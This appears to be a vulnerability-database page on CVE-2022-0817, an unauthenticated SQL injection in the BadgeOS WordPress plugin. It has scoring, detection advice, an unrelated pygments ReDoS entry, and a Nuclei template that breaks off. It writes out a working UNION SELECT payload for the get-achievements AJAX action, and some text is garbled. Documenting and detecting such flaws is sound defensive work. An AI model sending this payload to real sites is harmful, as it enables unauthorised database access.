CVE-2022-0817
published 2022-05-09CVE-2022-0817: The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL…
PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
11.48%
95.5th percentile
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| badgeos | badgeos | <= 3.7.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -↗
- →Detect unauthenticated POST requests to /wp-admin/admin-ajax.php with action=get-achievements and SQL UNION injection in the user_id parameter ↗
- →Successful exploitation returns HTTP 200 with Content-Type application/json, body containing md5 hash output and the string 'badgeos-arrange-buttons' ↗
- →The SQL injection is exploitable by unauthenticated users via the AJAX action get-achievements; monitor for UNION-based payloads in the user_id POST parameter ↗
- ·Vulnerability affects BadgeOS WordPress plugin through version 3.7.0; version 3.7.1 and above are patched ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xx94-r2jp-2426: The BadgeOS WordPress plugin through 3
ghsa_unreviewed·2022-05-10
CVE-2022-0817 [CRITICAL] CWE-89 GHSA-xx94-r2jp-2426: The BadgeOS WordPress plugin through 3
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Red Hat
pygments: ReDoS in pygments
vendor_redhat·2023-11-26·CVSS 5.5
CVE-2022-40896 [MEDIUM] CWE-434 pygments: ReDoS in pygments
pygments: ReDoS in pygments
A ReDoS issue was discovered in pygments/lexers/smithy.py in pygments through 2.15.0 via SmithyLexer.
A denial-of-service vulnerability related to regular expressions was discovered in Pygments, specifically in the file pygments/lexers/smithy.py. An attacker could exploit this flaw by sending a carefully crafted request, leading to a denial-of-service situation.
Statement: https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages-part-2/
https://data.safetycli.com/vulnerabilities/CVE-2022-40896/58910/?utm_source=pyupio&utm_medium=redirect&utm_campaign=pyup_rd&utm_id=0817&utm_content=data
Mitigation: Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria co
No detection rules found.
Nuclei
WordPress BadgeOS <=3.7.0 - SQL Injection
nuclei·CVSS 9.8
CVE-2022-0817 [CRITICAL] WordPress BadgeOS <=3.7.0 - SQL Injection
WordPress BadgeOS =3.7.1) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
- https://github.com/20142995/sectool
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
epss-score: 0.64654
epss-percentile: 0.98463
cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: badgeos
product: badgeos
framework: wordpress
tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress,vuln
variables:
num: "999999999"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Ho
2022-05-09
Published